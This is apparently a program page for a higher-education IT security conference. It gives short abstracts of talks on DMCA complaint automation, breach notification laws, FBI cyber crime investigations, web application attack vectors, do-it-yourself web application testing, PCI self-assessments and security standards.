 |
|
 |
 |
 |
 |
 |
 |
 |
 |
 |
 |
 |
 |
 |
 |
 |
 |
 |
 |
 |
 |
 |
 |
|
Higher Education Copyright and Bandwidth Practices In November, I ran a survey of policies and practices for copyright/DMCA issues and bandwidth management in the higher education community. The results I published didn't include much analysis in order to avoid political fallout, but the data can teach us a lot about what is and is not effective and how reality differs from the story that often appears in the media. Automated DMCA Complaint Processing When processing DMCA takedown notices got to the point of take up one FTE, we decided it was time to automate. We have developed a fully automated process, from intake of complaint email, validating complaint, converting IP/Time to MAC address, Ticket generation, Capture & verification of student, Copyright Quiz and finally, report to appropriate dean. I got my FTE back and we have discovered some very interesting things about the timestamps that are sent with the notices. Security Breach Notification
Laws Ron Weikers will discuss the new Massachusetts data security breach notification law, as well as other state data security breach notification laws. He will also discuss a recent legal trend that tends to establish a duty of care by companies that handle personal data. Slides from the presentation:
Computer Intrusion and Cyber Crime Investigations This session will provide an overview of criminal and terrorist exploitation of technology, investigative and forensic response, technical and investigative challenges, and investigative coordination between academic institutions and law enforcement. The recent trends and results of the FBI Computer Crime Survey will be discussed. This session will also include recent FBI investigative case presentations. Slides from this presentation are not yet available. The video that was shown during the presentation is available directly from CNN here. Web Application Attack Vectors Web application development in the university environment is often
very decentralized. Some applications are designed by central IT
staff, but more often than not, students and research groups set
up their own web applications, to suit their individual needs. Developers
(and sometimes university security staff) often do not realize that
flaws in their web applications can be leveraged to launch effective
attacks against other university internal applications and systems. DIY Web Application Assessments Are you concerned about the security of your organization's web applications? Was your yearly budget exhausted hiring an external firm to perform just one vulnerability assessment? Don't want to pay the five-figure price tag for an automated web application scanner? Don't Panic! This talk will describe easy ways to test web applications for the most common security vulnerabilities using free or open-source tools (or none at all). I will also cover common industry testing methodologies and various ways that other organizations integrate security testing into their software development and acquisition life-cycles. Slides: Phil has requested that anyone interested in having a copy of his slide contact him directly. To help Phil avoid spam, I have encoded his e-mail in ROT-13 format. So after you decode it, you can e-mail him at cuvy.ebqevthrf [ng] tznvy.pbz. PCI and Departmental Security
Review VA Tech started doing Payment Credit Industry (PCI) self-assessments of University departments that handle credit card transactions. These PCI self-assessments are being done in anticipation of a full, official PCI audit of the University. This talk describes the process and tools used to perform these "audits". Examples of modified PCI assessment questionnaires and other documents will be shown. Building Security Standards Daniel Adinolfi and Brian Smith Sweeney were kind enough to provide us with a replacement presentation which they just happened to have. We were very appreciative of this last minute addition to our program. |
|
 |
 |
 |
 |